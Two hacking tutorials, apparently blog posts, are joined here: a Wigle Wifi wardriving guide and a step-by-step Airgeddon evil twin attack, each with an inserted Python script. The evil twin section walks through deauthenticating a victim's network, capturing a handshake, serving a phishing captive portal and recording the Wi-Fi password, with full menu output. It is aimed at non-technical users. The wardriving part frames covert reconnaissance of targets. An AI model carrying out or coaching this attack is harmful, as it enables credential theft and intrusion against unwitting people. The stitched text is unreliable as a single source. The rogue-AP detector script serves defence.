
Tossing an old Android smartphone with a decent battery into your hacking kit can let you quickly map hundreds of vulnerable networks in your area just by walking or driving past them. The practice of wardriving uses a Wi-Fi network card and a GPS receiver to passively discover and record the location and settings of nearby routers, and your phone makes it easy to spot the ones with security issues.

Introduction to Wardriving

In 2005, hacker Albert Gonzalez and friends were wardriving along a Miami highway, looking for vulnerable WEP networks. They realized that major retailers like Bob’s Stores, HomeGoods, Marshalls, T.J. Maxx, and A.J. Wright were using insecure WEP-encrypted wireless networks in their retail locations. Worse, these stores used the network to service the in-store credit card payment systems.

What happened next was one of the greatest thefts of customer credit and debit card information in history.

Albert and his accomplices cracked the passwords of WEP networks in stores owned by TJX Companies, soon pivoting into the Massachusetts-based corporate network and planting a packet sniffer. This sniffer siphoned the details of 90 million customer credit and debit cards to a server in Ukraine, from which they were sold on the darknet for around $11 million. Although it was clear that TJX was aware of the security problems with WEP encryption, the company thought it unlikely anyone would notice.

Wardriving as a concept has been around since the ’90s, fueled by programs like NetStumbler. It turns out you can do a lot with wardriving data, and since then everyone from hackers to location providers like Skyhook has scanned and logged Wi-Fi networks worldwide.

In the early 2000s, Google got into the wardriving game and began collecting geotagged Wi-Fi data early in its Google Street View initiative. Led by engineer Marius Milner, the creator of NetStumbler, Google Street View cars began logging the Wi-Fi networks of people around the world, creating a directory of wireless networks tied to addresses and Google Maps imagery. This data also included information from networks which had been left unencrypted, causing Google a lot of legal trouble over privacy concerns and resulting in over $7 million in fees.

More recently, the US military, keen to avoid GPS jamming (which causes drones to become confused and predictable), has been developing NAVSOP, or Navigation via Signals of Opportunity, a way of determining your position from whatever signals happen to be nearby even when traditional navigation systems have been cut off.

Wardriving is a Tactical Tool

In this guide, we will be using an Android adaptation of Wigle (Wireless Geographic Logging Engine), which will harvest our data and plug it into the Wigle.net database. Why search only your data when thousands of other people have already contributed?

Wigle Wifi Wardriving, a free Android app, shows the location, channel, encryption, and other important qualities of a Wi-Fi network without ever needing to connect to it.

First started in 2001, the Wigle.net website is a collective searchable database of all discovered networks that have been contributed by wardrivers over the past decade. With over 323,446,100 networks mapped to date, searching Wigle.net is a powerful way to perform a database correlation attack. You can also download your entire personal database at any time through the app, as it’s stored on the Wigle.net server if you choose to upload it.

Our focus here will be on creating and linking a Wigle.net account with the Wigle Wifi Wardriving Android app (which we’ll just call “Wigle Wifi” from now on) to allow us to build our databases of wireless networks, as well as search a crowdsourced database when needed.

Because Wigle Wifi uses easily available hardware, no specialized computer is needed to conduct a detailed analysis of a target. Even an old Android phone will support the Wigle Wifi app. It’s subtle and can be used with no trace, so this method can be used in any high-security location discreetly.

Like cellular triangulation, Wigle Wifi locates networks by combining multiple sightings of an access point. Each sighting pairs a precise GPS fix with a signal strength measurement, and together they are used to calculate the likely position of the router, often down to a few meters. From a signals intelligence perspective, this gives us the ability to run passive, undetectable reconnaissance against a target, plus the ability to query a massive database of geolocated APs contributed by other wardrivers to track down the networks named in probe frames.

Step 1. Setting Up a Wigle Account

Wigle Wifi is tightly integrated with the Wigle.net database and website. So before we even install the Wigle Wifi app, we’ll want to create a Wigle.net account.

If you’re on your computer, just navigate to Wigle.net in your browser and click on the “Login” button up top to show the “Register” option. In your phone’s browser, after going to the website, tap on the hamburger icon, select “Login,” then “Register.”

Fill out the fields to create your free account. After that, remember the user name and password so you can input it into the Wigle Wifi app later. This will allow you to upload to the site and retrieve your entire database.

Step 2. Installing Wigle Wifi

Wigle Wifi is available in the Google Play Store, so just visit that link to download and install it onto your Android device. It requires Android 4.0 or higher, so it will work on nearly any old smartphone you have collecting dust around your place.

Step 3. Running Wigle Wifi on Android

Once you’ve got the app installed, open it to the main screen. Wigle Wifi is an aggressive app and will override settings to turn the Wi-Fi card on while it’s running, so don’t be surprised if your Wi-Fi turns on with Wigle Wifi running in the background.

After granting the app all of the required permissions, a run should start right away. If not, make sure you’re on the “Network List” page (via the hamburger icon), then tap on the three-dots icon in the top right. Select “Scan On” to begin scanning through channels and collecting wireless information. This will immediately begin displaying wireless networks in the area.

The “Network List” screen with scanning off.

Keep in mind, Wigle Wifi will consume extra power while scanning and logging networks. The more often you run it in the background, though, the better location accuracy you’ll get. You can go back to the same three-dot menu and select “Scan Off” when you don’t need it.

Step 4. Adjusting Wigle Wifi’s Settings

To adjust the settings, you can access the menu by tapping the hamburger icon on the top left and selecting the “Settings” option. At the top of this menu, you can enter your Wigle.net login and password.

Here, you can also adjust the display and run options, as well as specific options like how to increase or decrease scan times in response to changes in speed. Increasing the number of scans will drain the battery faster but capture more networks if you’re moving quickly.

Step 5. Backing Up Your Runs from Wigle Wifi

Make sure you’ve entered your Wigle.net login at the top of the “Settings” menu item, then back up your data in the app by tapping the “Upload to Wigle.net” button on the Network List page. When you upload your runs, you’ll always be able to view and download them later on Wigle.net.

Here, we see many runs with number of networks and other information displayed.

Step 6. Using the Wigle.net Website

To easily search your entire database, as well as other contributed data, we’ll open Wigle.net in a browser. You can do this on your phone’s browser or your computer’s browser.

There are many ways to search for information on Wigle.net. In the Wigle Wifi app, you can search for nearby networks, but on the website, you can search the entire database of contributions. The most obvious settings are under the “Search” function that appears after you log into your account.

Searching the Wigle.net database for a network.

For a more visual overview of the target, check out the “Maps” section. You can type in an address and adjust overlay filters to create a graphical map of the target with wireless data overlaid.

Lots of people wardrive, and there is a lot of information already out there.

Selecting a network will give you more information about it. You can filter networks with the list of options on the right of the screen. Look up your address and see if your router has been logged!

Step 7. Searching Local Queries in Wigle Wifi’s Map

If you want to search a wardriving run on your phone rather than Wigle.net, you can do so (or watch results appear on the map live) by tapping the “Map” menu option. This will open a map of the area pinned to your current location and display nearby networks. Tapping on a network will bring up information about the manufacturer, the security used, and the channel and BSSID. Below, we see some mapped results from a local run.

Querying the local database on the Wigle Wifi app.

You can see how many networks you’ve collected in a run by selecting the “Dashboard” option in the menu.

Wigle Wifi lets you build your own database of networks around you.

Step 8. Data from Recon Runs in Wigle Wifi

Maybe you want to work with your data directly. Navigating to the “Database” tab in the Wigle Wifi app shows the various options for exporting data from Wigle Wifi.

If you want to pull everything you’ve ever uploaded into one file, you can select “Import Observed.” Doing this pulls from Wigle.net, so be prepared to wait a little for the download if you have a ton of networks. You can also use this tab to search network runs, although this functionality can sometimes be a little buggy.

The Wigle team also shared a few more tips with us for accessing your data. First, you can access the runs from your SD card or internal memory: each run is archived upon upload, and the SQLite database can be backed up and accessed. Second, the transid on your uploads page gives you a link to a KML representation of your run with bad and incomplete data points, for the most part, filtered out.
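The tips above point at the raw run data, and the earlier section on combining multiple sightings of an access point describes what you can do with it. As an added example, not code from the article or from the Wigle project, the following Python script parses a Wigle Wifi-style CSV export, groups sightings by BSSID, estimates each access point’s position with an RSSI-weighted centroid, and flags networks whose AuthMode is open or WEP, the kind of audit you would run over your own organization’s wireless footprint. The column layout, the pre-header line, and the sample rows are constructed assumptions about the export format; compare them against a real export before relying on the parser.

```python
import csv
from collections import defaultdict

# Constructed sample in the layout I assume a Wigle Wifi CSV export uses:
# one device/app pre-header line, a column header, then one row per sighting.
# MAC addresses and coordinates are made up.
SAMPLE_EXPORT = """\
WigleWifi-1.4,appRelease=2.53,model=Example,release=9,device=example,display=example,board=example,brand=Example
MAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type
02:00:00:00:00:01,CoffeeGuest,[ESS],2019-12-13 10:00:01,6,-50,40.00000,-74.00000,10,5,WIFI
02:00:00:00:00:01,CoffeeGuest,[ESS],2019-12-13 10:00:07,6,-60,40.00100,-74.00000,10,5,WIFI
02:00:00:00:00:01,CoffeeGuest,[ESS],2019-12-13 10:00:13,6,-70,40.00000,-74.00100,10,5,WIFI
02:00:00:00:00:02,HomeNet,[WPA2-PSK-CCMP][ESS],2019-12-13 10:01:00,11,-65,40.00200,-74.00200,10,8,WIFI
02:00:00:00:00:03,OldPrinter,[WEP][ESS],2019-12-13 10:02:00,1,-80,40.00300,-74.00300,10,12,WIFI
"""


def parse_wigle_csv(text):
    """Return one dict per Wi-Fi sighting, skipping the pre-header line."""
    lines = text.splitlines()
    return [row for row in csv.DictReader(lines[1:]) if row.get("Type") == "WIFI"]


def classify_auth(authmode):
    """Bucket the AuthMode capability string into an audit category."""
    if "WEP" in authmode:
        return "weak-wep"
    if "WPA" not in authmode:
        return "open"
    return "wpa"


def weighted_centroid(sightings):
    """RSSI-weighted centroid of the observer positions.

    dBm is converted to linear power so the strongest sightings (closest to
    the AP) dominate the average; weak, distant sightings barely move it.
    """
    total = lat = lon = 0.0
    for s in sightings:
        w = 10 ** (int(s["RSSI"]) / 10)
        total += w
        lat += w * float(s["CurrentLatitude"])
        lon += w * float(s["CurrentLongitude"])
    return lat / total, lon / total


def audit(text):
    """Group sightings per BSSID and summarise position and encryption."""
    by_bssid = defaultdict(list)
    for row in parse_wigle_csv(text):
        by_bssid[row["MAC"]].append(row)
    report = {}
    for bssid, sightings in by_bssid.items():
        est_lat, est_lon = weighted_centroid(sightings)
        report[bssid] = {
            "ssid": sightings[0]["SSID"],
            "auth": classify_auth(sightings[0]["AuthMode"]),
            "sightings": len(sightings),
            "best_rssi": max(int(s["RSSI"]) for s in sightings),
            "lat": round(est_lat, 6),
            "lon": round(est_lon, 6),
        }
    return report


def weak_networks(report):
    """BSSIDs that are open or WEP, sorted for stable output."""
    return sorted(b for b, r in report.items() if r["auth"] != "wpa")


if __name__ == "__main__":
    rep = audit(SAMPLE_EXPORT)
    for bssid in weak_networks(rep):
        r = rep[bssid]
        print(f"{bssid} {r['ssid']:<12} {r['auth']:<9} sightings={r['sightings']} "
              f"est=({r['lat']}, {r['lon']})")
```

The centroid only improves with sightings taken from different directions, which is why the article recommends leaving the app scanning in the background across several trips; a single sighting simply returns the observer’s own position.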

Step 9. Contributing to the Big Picture

Wigle.net works because of people contributing. If you feel like adding to the giant pool of knowledge that is Wigle.net (or you’ve got a competitive streak), consider adding to the community database to build a better OSINT tool for fellow wireless researchers.

There is a thriving community of wardrivers who compete to discover the most networks, and anyone can join! You can even create a team to rank up against other wardriving teams. With some users having discovered millions of new networks, competition is fierce for a place in wardriving history. Check out the “Rankings” menu item in the app.

It currently takes finding over 100,000 new (previously unknown to Wigle.net) Wi-Fi networks just to crack the top 500 users on Wigle’s leaderboard, so be prepared to do some serious hunting to earn street cred in the wardriving community!

Conclusion

Whether you’re wardriving for tactical network reconnaissance, to build a database of your city’s Wi-Fi networks, or just to contribute to an exciting project, Wigle Wifi is a great tool to quickly learn about the wireless world around you.

Tactical wardriving, or warwalking, can give you a picture of a target’s wireless infrastructure.

If you have any questions, ask them here on Instagram @iamshubhamkumar__.

Posted by Shubham ;)




While Wi-Fi networks can be set up by smart IT people, that doesn’t mean the users of the system are similarly tech-savvy. We’ll demonstrate how an evil twin attack can steal Wi-Fi passwords by kicking a user off their trusted network while creating a nearly identical fake one. This forces the victim to connect to the fake network and supply the Wi-Fi password to regain internet access.

While a more technical user might spot this attack, it’s surprisingly effective against those not trained to look for suspicious network activity. It succeeds because most users don’t know what a real router firmware update looks like, so they fail to recognize that an attack is in progress.

What Is an Evil Twin Attack

An evil twin attack is a type of Wi-Fi attack that works by taking advantage of the fact that most computers and phones will only see the “name” or ESSID of a wireless network. This actually makes it very hard to distinguish between networks with the same name and same kind of encryption. In fact, many networks will have several network-extending access points all using the same name to expand access without confusing users.

If you want to see how this works, you can create a Wi-Fi hotspot on your phone and name it the same as your home network, and you’ll notice it’s hard to tell the difference between the two networks or your computer may simply see both as the same network. A network sniffing tool like Wigle Wifi on Android or Kismet can clearly see the difference between these networks, but to the average user, these networks will look the same.

This works great for tricking a user into connecting if we have a network with the same name, same password, and same encryption, but what if we don’t know the password yet? We won’t be able to create a network that the user’s device will join automatically, but we can use a social engineering attack to pressure the user into giving us the password by kicking them off the real network.

Using a Captive Portal Attack

In a captive portal-style evil twin attack, we will use the Airgeddon wireless attack framework to try to force the user to connect to an open network with the same name as the network they trust. A captive portal is something like the screen you see when connecting to an open network at a coffee shop, on a plane, or at a hotel. This screen that contains terms and conditions is something people are used to seeing, and we’ll be using that to our advantage to create a phishing page that looks like the router is updating.

The way we’ll trick the victim into doing this is by flooding their trusted network with de-authentication packets, making it impossible to connect to the internet normally. When confronted with an internet connection that refuses to connect and won’t allow any internet access, the average irritated user will discover an open Wi-Fi network with the same name as the network they are unable to connect to and assume it is related to the problem.

Upon connecting to the network, the victim will be redirected to a phishing page explaining that the router has updated and requires a password to proceed. If the user is gullible, they’ll enter the network password here, but that’s not where the fun stops. If the victim gets irritated by this inconvenience and types the wrong password, we need to be able to tell a wrong password from the right one. To do this, we’ll capture a handshake from the network first, so we can check each password the user gives us and tell when the correct one is entered.

Technologically Assisted Social Engineering

In order for this attack to work, a few key requirements need to be met. First, this attack requires the user to make some careless decisions. If the target you are selecting is known for being tech-savvy, this attack may not work. An advanced user, or anyone with cybersecurity awareness training, will spot this attack in progress and very possibly know that it is a relatively close-range attack. Against a well-defended target, you can expect this attack to be detected and even localized to find you.

Second, the victim must be successfully de-authenticated from their network, and be frustrated enough to join a totally unknown open network that just appeared out of nowhere with the same name as the network they trust. Further, attempting to connect to this network (on macOS) even yields a warning that the last time the network was connected to, it used a different kind of encryption.

Finally, the victim must enter the network password into the sometimes sketchy-looking phishing page they are redirected to after joining the open network the attacker has created. There are a lot of clues that could tip a sharp user off that this page is fake, including the wrong language, the wrong brand of router (if the phishing page mentions one), or misspellings and broken English in the text of the page. Since router pages usually look pretty ugly, these details may not stand out to anyone unfamiliar with what their router’s admin page looks like.
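The requirements above also describe what a defender can see: a burst of deauthentication frames directed at the real AP, followed by an open network advertising a trusted SSID from an unfamiliar BSSID (the same change of encryption the macOS warning keys on). As an added example, not code from the article or from the Airgeddon project, the following Python script applies both checks to a constructed frame log of the kind a monitor-mode sniffer such as Kismet would produce. The frame record layout, the known-AP inventory, the BSSIDs and the thresholds are all constructed assumptions for the example.

```python
from collections import defaultdict, deque

# Constructed inventory of our own access points: SSID -> {(BSSID, security)}.
# Anything else beaconing one of these SSIDs is suspicious.
KNOWN_APS = {
    "CorpWiFi": {("02:11:22:33:44:55", "WPA2-PSK")},
}

DEAUTH_THRESHOLD = 20   # deauth frames per BSSID ...
DEAUTH_WINDOW_S = 5.0   # ... within this many seconds triggers an alert


def make_sample_frames():
    """Constructed frame log: normal beacons, a deauth burst, then an open
    twin of CorpWiFi from an unknown BSSID. Times are seconds."""
    real = "02:11:22:33:44:55"
    frames = [{"t": float(i), "type": "beacon", "bssid": real,
               "ssid": "CorpWiFi", "security": "WPA2-PSK"} for i in range(5)]
    # Deauth frames carry the real AP's BSSID as their source, so the count is
    # keyed on the BSSID being impersonated.
    frames += [{"t": 10.0 + i * 0.1, "type": "deauth", "bssid": real,
                "ssid": None, "security": None} for i in range(30)]
    frames += [{"t": 14.0 + i, "type": "beacon", "bssid": "02:aa:bb:cc:dd:ee",
                "ssid": "CorpWiFi", "security": "OPEN"} for i in range(3)]
    return frames


def detect(frames, known=KNOWN_APS, threshold=DEAUTH_THRESHOLD,
           window=DEAUTH_WINDOW_S):
    """Return a list of alerts in time order: one per deauth flood source and
    one per (BSSID, security) pair that beacons a known SSID but is not ours."""
    alerts = []
    recent_deauth = defaultdict(deque)   # bssid -> timestamps in the window
    flooding = set()
    rogue_seen = set()
    for f in sorted(frames, key=lambda x: x["t"]):
        if f["type"] == "deauth":
            q = recent_deauth[f["bssid"]]
            q.append(f["t"])
            while q and f["t"] - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) > threshold and f["bssid"] not in flooding:
                flooding.add(f["bssid"])
                alerts.append({"kind": "deauth_flood", "bssid": f["bssid"],
                               "count": len(q), "t": f["t"]})
        elif f["type"] == "beacon" and f["ssid"] in known:
            key = (f["bssid"], f["security"])
            if key not in known[f["ssid"]] and key not in rogue_seen:
                rogue_seen.add(key)
                expected = sorted({sec for _, sec in known[f["ssid"]]})
                alerts.append({"kind": "rogue_ap", "ssid": f["ssid"],
                               "bssid": f["bssid"], "security": f["security"],
                               "expected_security": expected, "t": f["t"]})
    return alerts


if __name__ == "__main__":
    for a in detect(make_sample_frames()):
        print(a)
```

Keying the rogue check on the (BSSID, security) pair rather than the BSSID alone means the script also fires if someone spoofs the real BSSID while dropping encryption, which is exactly the condition the victim’s operating system warns about but the victim tends to click through.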

Step 1. Make Sure You Have Everything

To prepare our evil twin access point attack, we’ll need to be using Kali Linux or another supported distro. Quite a few distributions are supported; check the Airgeddon GitHub page for the full list of distributions Airgeddon works with.

You can use a Raspberry Pi running Kali Linux for this with a wireless network adapter, but you’ll need to have access to the GUI rather than being SSHed into the Pi, since the script opens and navigates multiple terminal windows.

Finally, you’ll need a good wireless network adapter for this. In our tests, we found that the TP-Link WN722N v1 and Panda Wireless PAU07 cards performed well with these attacks. You can find more information about choosing a good wireless network adapter at the link below.

Step 2. Install Airgeddon

To start using the Airgeddon wireless attack framework, we’ll need to download Airgeddon and any needed programs. The developer also recommends downloading and installing a tool called CCZE to make the output easier to read. You can do so by typing apt-get install ccze in a terminal window.

~# apt-get install ccze

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
  libgit2-27
Use 'apt autoremove' to remove it.
The following NEW packages will be installed:
  ccze
0 upgraded, 1 newly installed, 0 to remove and 1772 not upgraded.
Need to get 77.2 kB of archives.
After this operation, 324 kB of additional disk space will be used.
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 ccze amd64 0.2.1-4+b1 [77.2 kB]
Fetched 77.2 kB in 1s (77.4 kB/s)
Selecting previously unselected package ccze.
(Reading database ... 411785 files and directories currently installed.)
Preparing to unpack .../ccze_0.2.1-4+b1_amd64.deb ...
Unpacking ccze (0.2.1-4+b1) ...
Setting up ccze (0.2.1-4+b1) ...
Processing triggers for man-db (2.8.5-2) ...

Next, we’ll install Airgeddon with git clone.

~# git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Cloning into 'airgeddon'...
remote: Enumerating objects: 6940, done.
remote: Total 6940 (delta 0), reused 0 (delta 0), pack-reused 6940
Receiving objects: 100% (6940/6940), 21.01 MiB | 10.31 MiB/s, done.
Resolving deltas: 100% (4369/4369), done.

Then change directories and start Airgeddon with the following commands.

~# cd airgeddon
~/airgeddon# sudo bash ./airgeddon.sh

If you see the alien spaceship, you know you’re ready to hack.

************************************ Welcome ************************************

Welcome to airgeddon script v10.0

                   .__                          .___  .___
           _____   |__|______  ____    ____   __| _/__| _/____   _____
            \__  \ |  \_  __ \/  ___\_/ __ \ / __ |/ __ |/  _ \ /     \
             / __ \|  ||  | \/  /_/  >  ___// /_/ / /_/ (  <_> )   |   \
            (____  /__||__|   \___  / \___  >____ \____ |\____/|___|   /
                 \/          /_____/      \/     \/    \/           \/

                               Devloped by v1s1t0r

                          *        .  _.---._          .
                                *  . '       ' .  .
                               _.-~=============~-._ *
                            . (_____________________)        *
                             *     \___________/        .

Step 3. Configure Airgeddon

Press Enter to check the various tools the Airgeddon framework relies on. If you’re missing any (it’ll say “Error” next to them), you can hit Y and Enter at the prompt to try and auto-install anything missing, but that generally doesn’t work.

Instead, open a new terminal window and type apt-get install tool, substituting the name of the missing tool for “tool.” If that doesn’t work, you can also try sudo pip install tool. You should install all the tools; otherwise, you may experience problems during your attack, especially if you are missing dnsspoof.

*********************************** Welcome ************************************
This script is only for educational purposes. Be good boyz&girlz!
Use it only on your own networks!!

Accepted bash version (5.0.3(1)-release). Minimum required version: 4.2

Root permissions successfully detected

Detecting resolution... Detected!: 1408x1024

Known compatible distros with this script:
"Arch" "Backbox" "BlackArch" "CentOS" "Cyborg" "Debian" "Fedora" "Gentoo" "Kali" "Kali arm" "Mint" "OpenMandriva" "Parrot" "Parrot arm" "Pentoo" "Raspbian" "Red Hat" "SuSE" "Ubuntu" "Wifislax"

Detecting system...
Kali Linux

Let's check if you have installed what script needs
Press [Enter] key to continue...

Essential tools: checking...
ifconfig .... Ok
iwconfig .... Ok
iw .... Ok
awk .... Ok
airmon-ng .... Ok
airodump-ng .... Ok
aircrack-ng .... Ok
xterm .... Ok
ip .... Ok
lspci .... Ok
ps .... Ok

Optional tools: checking...
sslstrip .... Ok
asleap .... Ok
bettercap .... Ok
packetforge-ng .... Ok
etterlog .... Ok
hashcat .... Ok
wpaclean .... Ok
john .... Ok
aireplay-ng .... Ok
bully .... Ok
ettercap .... Ok
mdk4 .... Ok
hostapd .... Ok
lighttpd .... Ok
pixiewps .... Ok
wash .... Ok
openssl .... Ok
dhcpd .... Ok
reaver .... Ok
dnsspoof .... Ok
beef-xss .... Ok
hostapd-wpe .... Ok
iptables .... Ok
crunch .... Ok

Update tools: checking...
curl .... Ok

Your distro has all necessary essential tools. Script can continue...
Press [Enter] key to continue...

When you have all of the tools, proceed to the next step by pressing Enter. Next, the script will check for internet access so it can update itself if a newer version exists.

The script will check for internet access looking for a newer version. Please be patient...

The script is already in the latest version. It doesn't need to be updated
Press [Enter] key to continue...

When that is done, press Enter to select the network adapter to use. Press the number on your keyboard that correlates to the network adapter in the list, then Enter.

***************************** Interface selection ******************************
Select an interface to work with:
---------
1.  eth0  // Chipset: Intel Corporation 82540EM
2.  wlan0 // 2.4Ghz // Chipset: Atheros Communications, Inc. AR9271 802.11n
---------
*Hint* Every time you see a text with the prefix [PoT] acronym for "Pending of Translation", means the translation has been automatically generated and is still pending of review
---------
>

After we select our wireless network adapter, we’ll proceed to the main attack menu.

***************************** airgeddon main menu ******************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz

Select an option from menu:
---------
0.  Exit script
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
---------
4.  DoS attacks menu
5.  Handshake tools menu
6.  Offline WPA/WPA2 decrypt menu
7.  Evil Twin attacks menu
8.  WPS attacks menu
9.  WEP attacks menu
10. Enterprise attacks menu
---------
11. About & Credits
12. Options and language menu
---------
*Hint* If you install ccze you'll see some parts of airgeddon in a colorized way with better aspect. It's not a requirement or a dependency, but it will improve the user experience
---------
>

Press 2 and Enter to put your wireless card into monitor mode. Next, select option 7 and Enter for the “Evil Twin attacks” menu, and you’ll see the submenu for this attack module appear.

**************************** Evil Twin attacks menu ****************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz
Selected BSSID: None
Selected channel: None
Selected ESSID: None

Select an option from menu:
---------
0.  Return to main menu
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
4.  Explore for targets (monitor mode needed)
---------------- (without sniffing, just AP) -----------------
5.  Evil Twin attack just AP
---------------------- (with sniffing) -----------------------
6.  Evil Twin AP attack with sniffing
7.  Evil Twin AP attack with sniffing and sslstrip
8.  Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF
------------- (without sniffing, captive portal) -------------
9.  Evil Twin AP attack with captive portal (monitor mode needed)
---------
*Hint* In order to use the Evil Twin just AP and sniffing attacks, you must have another one interface in addition to the wifi network interface will become the AP, which will provide internet access to other clients on the network. This doesn't need to be wifi, can be ethernet
---------
>

Step 4. Select the Target

Now that we’re in our attack module, select option 9 and Enter for the “Evil Twin AP attack with captive portal.” We’ll need to explore for targets, so press Enter, and you’ll see a window appear that shows a list of all detected networks. You’ll need to wait a little for the list of nearby networks to populate.

An exploration looking for targets is going to be done...
Press [Enter] key to continue...

**************************** Exploring for targets ****************************
Exploring for targets option chosen (monitor mode needed)
Selected interface wlan0mon is in monitor mode. Explorations can be performed
WPA/WPA2 filter enabled in scan. When started, press [Ctrl+C] to stop...
Press [Enter] key to continue...
Exploring for targets

CH 12 ][ Elapsed: 12 s ][ 2019-12-13 05:28
BSSID          PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
██████████████ -59        9        0    0  11  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -58        5        0    0  11  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -80       12        0    0  11  54e. WPA2 CCMP   PSK  ██████████████
██████████████ -79       14        0    0   6  54e. WPA2 CCMP   PSK  ██████████████
██████████████ -82        6        0    0   1  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -83        6        1    0   2  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -85        2        0    0   6  54e. WPA2 CCMP   PSK  ██████████████

BSSID            STATION            PWR   Rate     Lost    Frames  Probe
(not associated) 00:7E:56:97:E9:B0  -68    0 - 1     29         5
██████████████   E8:1A:1B:D9:75:0A  -38    0 -24e     0         1
██████████████   62:38:E0:34:6A:7E  -58    0 - 0e     0         1
██████████████   DC:3A:5E:1D:3E:29  -57    0 -24    148         5

After it runs for about 60 seconds, exit out of the small window, and a list of targets will appear. You’ll notice that networks with someone using them appear in yellow with an asterisk next to them. This is essential since you can’t trick someone into giving you the password if no one is on the network in the first place.

**************************** Select target ****************************

  N.      BSSID      CHANNEL  PWR   ENC     ESSID
------------------------------------------------------
  1)* ██████████████    11    41%   WPA2   ██████████████
  2)* ██████████████    11    20%   WPA2   ██████████████
  3)  ██████████████     6    15%   WPA2   ██████████████
  4)  ██████████████     6    19%   WPA2   ██████████████
  5)  ██████████████     2    17%   WPA2   ██████████████
  6)  ██████████████     1    18%   WPA2   ██████████████
  7)  ██████████████    11    42%   WPA2   ██████████████

(*) Network with clients
------------------------------------------------------
Select target network:

Select the number of the target you wish to attack, and press Enter to proceed to the next screen.

Step 5. Gather the Handshake

Now, we’ll select the type of de-authentication attack we want to use to kick the user off their trusted network. I recommend the second option, “Deauth aireplay attack,” but different attacks will work better depending on the network.

Press Enter once you’ve made your selection, and you’ll be asked if you’d like to enable DoS pursuit mode, which allows you to follow the AP if it moves to another channel. You can select yes (Y) or no (N) depending on your preference, and then press Enter. Finally, you’ll select N for using an interface with internet access. We won’t need one for this attack, and not depending on an internet source makes the attack more portable.

Handshake file selected: None
Selected internet interface: None

Select an option from menu:
---------
0.  Return to Evil Twin attacks menu
---------
1.  Deauth / disassoc amok mdk3 attack
2.  Deauth aireplay attack
3.  WIDS / WIPS / WDS Confusion attack
---------
*Hint* If you can't deauth clients from an AP using an attack, choose another one :)
---------
2

If you want to integrate "DoS pursuit mode" on an Evil Twin attack, another additional wifi interface in monitor mode will be needed to be able to perform it

Do you want to enable "DoS pursuit mode"? This will launch again the attack if target AP change its channel countering "channel hopping" [y/N]
N
At this point there are two options to prepare the captive portal. Either having an interface with internet access, or making a fake DNS using dnsspoof

Are you going to use the interface with internet access method? If the answer is no ("n"), you'll need dnsspoof installed to continue. Both will be checked [y/N]
N

Next, it will ask you if you want to spoof your MAC address during the attack. In this case, I chose N for “no.”

Now, if we don’t already have a handshake for this network, we’ll have to capture one now. Be VERY careful not to accidentally select Y for “Do you already have a captured Handshake file?” if you do not actually have a handshake. There is no clear way to go back to the script without restarting if you make this mistake.

Since we don’t yet have a handshake, type N for no, and press Enter to begin capturing.

******************* Evil Twin AP attack with captive portal *******************
Interface wlan0mon selected. Mode: Monitor. Supported bands: 2.4Ghz
Selected BSSID: ██████████████
Selected channel: 11
Selected ESSID: ██████████████
Deauthentication chosen method: Aireplay
Handshake file selected: None
---------
*Hint* Sslstrip technique is not infallible. It depends on many factors and not always work. Some browsers such as Mozilla Firefox latest versions are not affected
---------

Do you want to spoof your MAC address during this attack? [y/N]
N
This attack requires that you have previously a WPA/WPA2 network captured Handshake file

If you don't have a captured Handshake file from the target network you can get it now
---------

Do you already have a captured Handshake file? Answer yes ("y") to enter the path or answers no ("n") to capture a new one now [y/N]
N

Once the capture process has started, a window with red text sending deauth packets and a window with white text listening for handshakes will open. You’ll need to wait until you see “WPA Handshake:” and then the BSSID address of your targeted network. In the example below, we’re still waiting for a handshake.

Once you see that you’ve got the handshake, you can exit out of the “Capturing Handshake” window. When the script asks you if you got the handshake, select Y, and save the handshake file. Next, select the file the captured password will be written to, and you’re ready to go to the final step of configuring the phishing page.

Step 6. Set Up the Phishing Page

In the last step before launching the attack, we’ll set the language of the phishing page. The page provided by Airgeddon is pretty decent for testing out this style of attack. In this example, we’ll select 1 for English. When you’ve made your selection, press Enter, and the attack will begin with six windows opening to perform various functions of the attack simultaneously.

Selected BSSID: ██████████████
Selected channel: 11
Selected ESSID: ██████████████
Deauthentication chosen method: Aireplay
Handshake file selected: /root/handshake-██████████████.cap

Choose the language in which network clients will see the captive portal:
---------
0.  Return to Evil Twin attacks menu
---------
1.  English
2.  Spanish
3.  French
4.  Catalan
5.  Portuguese
6.  Russian
7.  Greek
8.  Italian
9.  Polish
10. German
---------
*Hint* On Evil Twin attack with BeEF intergrated, in addition to obtaining keys using sniffing techniques, you can try to control the client's browser launching numerous attack vectors. The success of these will depend on many factors such as the kind of client's browser and its version
---------

Step 7. Capture Network Credentials

With the attack underway, the victim should be kicked off their network and see our fake one as the only seemingly familiar option. Be patient, and pay attention to the network status in the top-right window. This will tell you when a device joins the network, allowing you to see any password attempts they make when they’re routed to the captive portal.

When the victim joins your network, you’ll see a flurry of activity like in the picture below. In the top-right corner, you’ll be able to see any failed password attempts, which are checked against the handshake we gathered. This will continue until the victim inputs the correct password, and all of their internet requests (seen in the green text box) will fail until they do so.

When the victim caves and finally enters the correct password, the windows will close except for the top-right window. The fake network will vanish, and the victim will be free to connect back to their trusted wireless network.

The credentials should be displayed in the top-right Control screen, and you should copy and paste the password into a file yourself, in case the script doesn’t save the file correctly (the “ambiguous redirect” error visible in the Control window output below is one form this failure takes). This happens from time to time, so don’t skip this step or you might lose the password you just captured.

Control

       Evil Twin AP Info // BSSID: ██████████████ // Channel: 11 // ESSID: ██████████████

       Online time
       00:01:40

       Password captured successfully:

/tmp/ag.control.sh: line 37: ${log_path}: ambiguous redirect
       ██████████████

       The password was saved on file: [/root/evil_twin_captive_portal_password-██████████████.██████.txt

